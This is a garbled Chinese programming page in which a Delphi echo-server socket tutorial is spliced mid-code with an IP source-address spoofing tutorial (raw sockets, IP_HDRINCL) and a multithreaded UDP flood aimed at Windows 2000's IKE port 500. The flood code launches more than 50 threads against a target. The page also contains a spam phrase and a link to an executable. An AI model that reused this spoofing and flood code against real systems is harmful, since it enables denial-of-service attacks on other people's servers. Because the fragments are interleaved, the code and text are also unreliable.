我把socket编程教程的第一个例子改写了一下
服务器接受客户信息,再反送回去

 IP地址的隐藏
一、前言
 
本文主要介绍如何在程序中实现IP地址的隐藏。其实这篇东西不算我写的。其中《IP头结构》部分我懒得打字,故复制、粘贴了孤独剑客的文章,先说声谢谢!代码部分参考了外国程序xes写的一个程序。所以这只是学习过程中的一个副产品。既然程序已经做好了,就顺便放上来跟大家一起交流,共同提高吧。本文只不过想说明一下IP数据的结构和发送机制。如果有人把它改为恶意IP攻击工具,后果自负。
二、IP头结构
    
我们知道,TCP/IP网络数据全部是通过封装在IP数据包中在Internet网上传送的,也就是封装建立起一个包含IP头和数据的IP数据报。一般来说,网络软件总是以多个32位字产生IP头,即使必须用附加的0填充IP头。IP头包含了传输IP数据包中封装数据的所有必要信息。IP头的数据结构和描述如下:

 
前些日子,看见有文章说win2000服务器的500端口对flood攻击防御不是很好,我测试了一下,发现很有效果,对win2000服务器的udp500发送大量包的时候,win2000服务器的cpu率一下子达到了100%,而且反应立刻迟钝下来.

实际上是直接调用win api
在delphi4下用命令行编译
dcc32 -cc server1.pas
用windows自带的telnet测试

成员 长度(Bit) 描述
Version 4 IP头的版本号,目前是IPv4,最新是IPv6
Header Length 4 IP头的长度,若没有特殊选择,IP头总是20字节长
Type of Service 8
服务类型,定义了数据传输的优先级、延迟、吞吐量和可靠性等特性
Total Packet Length 16 IP包的长度,若没有特殊选项,一般为20字节长
Identification 16 IP包标识,主机使用它唯一确定每个发送的数据报
Flag 3 IP数据分割标志
Fragment Offset 13 IP数据分割偏移
Time to Live 8 数据报在网络上的存活时间,每通过一个路由器,该数值减一
Protocol 8 TCP/IP协议类型,比如:ICMP为1,IGMP为2,TCP为6,UDP为17等
Header Checksum 16 头部检验和
Source IP Address 32 源IP地址
Destination IP Address 32 目的IP地址
Other ? 其他选项
Data ? 数据
    
实现自己定义的IP头是一件非常有意义的事情,比如,通过改变IP头里的TOS的优先级和TTL,你可以使自己的数据包有更强的传输能力和寿命,通过修改IP头里的源IP地址就可以隐藏自己机器的IP地址等等。象著名攻击程序“泪滴TearDrop”就是通过故意制造系统不能处理的分片IP包而实现的,还有SYN
Flooder和UDP Flooder就是通过产生随机源IP实现欺骗的。
三、实现原理
    
一般来说,自定义IP头是通过使用socket的库函数setsockopt()的选项IP_HDRINCL来实现的,尽管这在unix和linux平台上很容易实现,但遗憾的是在Windows平台的Winsock1.1和Winsock2.0函数库里setsockopt()不支持IP_HDRINCL选项,所以在Windows
9x/NT里是无法通过Winsock函数库来实现IP头自定义的,当然可以通过编写虚拟设备驱动程序来实现,不过比较复杂,但Windows
2000的出现打破了这种局面,Windows2000的Winsock2.2函数库里全面支持setsockopt()的选项IP_HDRINCL,使得我们轻松就可以实现自定义的IP头。实现方法如下:
四、代码部分
{

程序如下:

server1.pas:
program server1;

  1. 本程序只能运行于 Window 2000.
  2. 你必须有 Administrator 权限.
  3. 程序需要用到一个 button 和一个 memo.

线程程序://线程的执行代码,创建线程请用菜单new一个TheadObject

uses windows,winsock;


uses winsock;

const myport=1414;//预定义口

运行程序前,请根据自己的需要改变 SrcIP、SrcPort、DestIP和DestPort的值

procedure udpdos.Execute;
var
wsa:TWSAData;
s: TSocket;
sockin: TSockAddrIn;
buf:array[0..1023] of byte;
i: integer;
DIP:string;
begin
  { Place thread code here }
//win2000下利用ike(udp 500)的DOS攻击
//by 杨顺
  FreeOnTerminate := true;

{type
 sockaddr_in = record
  case Integer of
   0: (sin_family: u_short;
     sin_port: u_short;
     sin_addr: TInAddr;
     sin_zero: array[0..7] of Char);
   1: (sa_family: u_short;
     sa_data: array[0..13] of Char)
 end;
 TSockAddrIn = sockaddr_in;
 PSOCKADDR = ^TSockAddr;
 TSockAddr = sockaddr_in;

如果你看不懂以下代码,最好不要去运行它。

}
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,
Dialogs,
StdCtrls, OleCtrls, Registry;

Const
SrcIP = 123.123.123.1;//发送方IP地址
SrcPort = 1234;         file://发送方端口
DestIP = 127.0.0.2;   file://目的IP地址
DestPort = 4321;        file://目的端口

Max_Message = 4068;
Max_Packet = 4096;

type

TPacketBuffer = Array[0..Max_Packet-1] of byte;

TForm1 = class(TForm)
Button1: TButton;
Memo1: TMemo;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
内部《IP头结构》部分自身无心打字,线程程序威尼斯人平台。public
{ Public declarations }
procedure SendIt;
end;

// IP 头
type
T_IP_Header = record
ip_verlen : Byte;
ip_tos : Byte;
ip_totallength : Word;
ip_id : Word;
ip_offset : Word;
ip_ttl : Byte;
ip_protocol : Byte;
ip_checksum : Word;
ip_srcaddr : LongWord;
ip_destaddr : LongWord;
end;

// UDP 头
Type
T_UDP_Header = record
src_portno : Word;
dst_portno : Word;
udp_length : Word;
udp_checksum : Word;
end;

// 一些 Winsock 2 的类型声明
u_char = Char;
u_short = Word;
u_int = Integer;
u_long = Longint;

SunB = packed record
s_b1, s_b2, s_b3, s_b4: u_char;
end;
SunW = packed record
s_w1, s_w2: u_short;
end;
in_addr = record
case integer of
0: (S_un_b: SunB);
1: (S_un_w: SunW);
2: (S_addr: u_long);
end;
TInAddr = in_addr;
Sockaddr_in = record
case Integer of
0: (sin_family: u_short;
sin_port: u_short;
sin_addr: TInAddr;
sin_zero: array[0..7] of Char);
1: (sa_family: u_short;
sa_data: array[0..13] of Char)
end;
TSockAddr = Sockaddr_in;
TSocket = u_int;

const
WSADESCRIPTION_LEN = 256;
WSASYS_STATUS_LEN = 128;

type
PWSAData = ^TWSAData;
WSAData = record //  WSDATA
wVersion: Word;
wHighVersion: Word;
szDescription: array[0..WSADESCRIPTION_LEN] of Char;
szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char;
iMaxSockets: Word;
iMaxUdpDg: Word;
lpVendorInfo: PChar;
end;
TWSAData = WSAData;

file://定义一些 winsock 2 函数
function closesocket(s: TSocket): Integer; stdcall;
function socket(af, Struct, protocol: Integer): TSocket; stdcall;
function sendto(s: TSocket; var Buf; len, flags: Integer; var addrto:
TSockAddr;
tolen: Integer): Integer; stdcall;{}
function setsockopt(s: TSocket; level, optname: Integer; optval:
PChar;
optlen: Integer): Integer; stdcall;
function inet_addr(cp: PChar): u_long; stdcall; {PInAddr;} { TInAddr
}
function htons(hostshort: u_short): u_short; stdcall;
function WSAGetLastError: Integer; stdcall;
function WSAStartup(wVersionRequired: word; var WSData: TWSAData):
Integer; stdcall;
function WSACleanup: Integer; stdcall;

const
AF_INET = 2; // internetwork: UDP, TCP, etc.

IP_HDRINCL = 2; // IP Header Include

SOCK_RAW = 3; // raw-protocol interface

IPPROTO_IP = 0; // dummy for IP
IPPROTO_TCP = 6; // tcp
IPPROTO_UDP = 17; // user datagram protocol
IPPROTO_RAW = 255; // raw IP packet

INVALID_SOCKET = TSocket(NOT(0));
SOCKET_ERROR = -1;

var
Form1: TForm1;

implementation

// Import Winsock 2 functions
const WinSocket = WS2_32.DLL;

function closesocket; external winsocket name closesocket;
function socket; external winsocket name socket;
function sendto; external winsocket name sendto;
function setsockopt; external winsocket name setsockopt;
function inet_addr; external winsocket name inet_addr;
function htons; external winsocket name htons;
function WSAGetLastError; external winsocket name WSAGetLastError;
function WSAStartup; external winsocket name WSAStartup;
function WSACleanup; external winsocket name WSACleanup;

{$R *.DFM}

function CheckSum(Var Buffer; Size : integer) : Word;
type
TWordArray = Array[0..1] of Word;
var
ChkSum : LongWord;
i : Integer;
begin
ChkSum := 0;
i := 0;
While Size > 1 do begin
ChkSum := ChkSum + TWordArray(Buffer);
inc(i);
Size := Size – SizeOf(Word);
end;

if Size=1 then ChkSum := ChkSum + Byte(TWordArray(Buffer));

ChkSum := (ChkSum shr 16) + (ChkSum and $FFFF);
ChkSum := ChkSum + (Chksum shr 16);

Result := Word(ChkSum);
end;

procedure BuildHeaders(
FromIP : String;
iFromPort : Word;
ToIP : String;
iToPort : Word;
StrMessage : String;
Var Buf : TPacketBuffer;
Var remote : TSockAddr;
Var iTotalSize : Word
);
Var
dwFromIP : LongWord;
dwToIP : LongWord;

iIPVersion : Word;
iIPSize : Word;
ipHdr : T_IP_Header;
udpHdr : T_UDP_Header;

iUdpSize : Word;
iUdpChecksumSize : W

一、前言
本文主要介绍如何在程序中实现IP地址的隐藏。其实这篇东西不算我写的。其中《IP头结构》部分我懒得打字,故复…

//destIP是主Form里面上,就是要攻击的对象,在主Form里面申明一个这样的变量就可以了
  DIP := DestIP;

 WSAData = record // !!! also WSDATA
  wVersion: Word;
  wHighVersion: Word;
  szDescription: array[0..WSADESCRIPTION_LEN] of Char;
  szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char;
  iMaxSockets: Word;
  iMaxUdpDg: Word;
  lpVendorInfo: PChar;
 end;
 TWSAData = WSAData;

//填充buf
  for i := 0 to 1023 do
    buf[i] := 97;

end
}

//初始化socket2
  WSAStartup($101,wsa);

var str:string;
  s,ns:TSocket;//type:u_int|integer;
  ver:word;
  rece:TWSAData;//type:WSAData;
  wsstatus:integer;//winsocket_status;
  i,pktlen:integer;
  szd:array[0..WSADESCRIPTION_LEN] of Char;
  szs:array[0..WSASYS_STATUS_LEN] of Char;
  server:TSockAddr;//tpye:sockaddr_in
  client:PSockAddr;//type:^sockaddr_in
  namelen:PInteger;//type:^Integer;
  buf:array[0..1023] of char;

//创建udp socket
  s := socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
  sockin.sin_family := AF_INET;
  sockin.sin_port := htons(IKE);
  sockin.sin_addr.S_addr := inet_addr(pchar(DIP));
  while true do
  begin
    if self.Terminated then
      break;

begin
ver:=514;
write(WSAStartup = );
try
wsstatus:=WSAStartup(ver,rece);
//初始化winsock;在windows下是必须的过程
writeln(wsstatus);//winsock状态,0代表成功
if wsstatus=0 then
begin
writeln;
writeln(********************************************************************************);
//以下显示winsock状态
write(wVersion = );
writeln(rece.wVersion);
write(wHighVersion = );
writeln(rece.wHighVersion);
write(iMaxSockets = );
writeln(rece.iMaxSockets);
write(iMaxUdpDg = );
writeln(rece.iMaxUdpDg);
writeln(szDescription is );
for i:=0 to WSADESCRIPTION_LEN do write(szd[i]);
writeln;
writeln(szSystemStatus is );
for i:=0 to WSASYS_STATUS_LEN do write(szs[i]);
writeln;
writeln(********************************************************************************);
end;

   //发送数据报
    sendto(s,buf,1024,0,sockin,sizeof(sockin));
  end;
  closesocket(s);
  WSACleanup;

write(socket = );
s:=socket(AF_INET,SOCK_STREAM,0);
//第一步,建立服务器的socket,0表示成功
writeln(s);
if s<0 then exit;

 end;

write(bind = );
server.sin_family := AF_INET;
server.sin_port := htons(myport);
server.sin_addr.s_addr := INADDR_ANY;
wsstatus:=bind(s,server,sizeof(server));
//第二步,绑定,0表示成功
writeln(wsstatus);
if wsstatus<>0 then exit;

主form里面,调用

write(listen = );
wsstatus:=listen(s,5);
//第三步,监听
writeln(wsstatus);
if wsstatus<>0 then exit;

  for i := 0 to 50 do
  begin
    udpdos.Create(false); //创建50多个线程,进行攻击
  end;

write(accept = );
new(client);
new(namelen);
namelen^:=sizeof(client^);
ns:=accept(s,client,namelen);
//第四步,等待接收
//注:bind时传递的是sockaddr_in结构的数据,accept时是两个指针!!!
if ns=-1 then //以下可以做成多线程过程
  begin
  writeln(-1);
  exit;
  end
  else
  begin
  writeln(ns);
  pktlen:=0;
  writeln(recv);
  repeat
  pktlen:= recv(ns,buf,1024,0);//接收数据
//pktlen=为接收长度,0表示断开联接,<0表示失败
  sleep(1);
  write(pktlen:5);
  if pktlen>0 then
  begin
  i:=send(ns,buf,pktlen,0);//返回数据
  end;
  until pktlen<1;//循环直到客户断开联接
  end;
finally
writeln;
writeln(********************************************************************************);
writeln(Press to exit winsocket);
readln(str);
wsstatus:=WSACleanup();//退出winsocket;
write(WSACleanup = );
writeln(wsstatus);
end;
writeln;
writeln(Press to exit);
readln(str);
end.

顺便提一下,坚持用户输入的ip是否合法,一句话就可以了

  

uses winsock

 补充日期: 2000-07-22 10:37:10

  if inet_addr(pchar(DestIP)) =  inaddr_none  then
  begin
    showmessage(输入的IP地址错误);
    exit;
  end;

二进制代码在 http://mamahu.363.net/server1.exe
我要离开南京了,临行前做个纪念,我会想念大家的

BTW: .abu. , how about "http://www.patching.net" now?

服务器接受客户信息,再反送回去 实际上是直接调用win api
在delphi4下用命令行编译 dcc32 -cc serv…

相关文章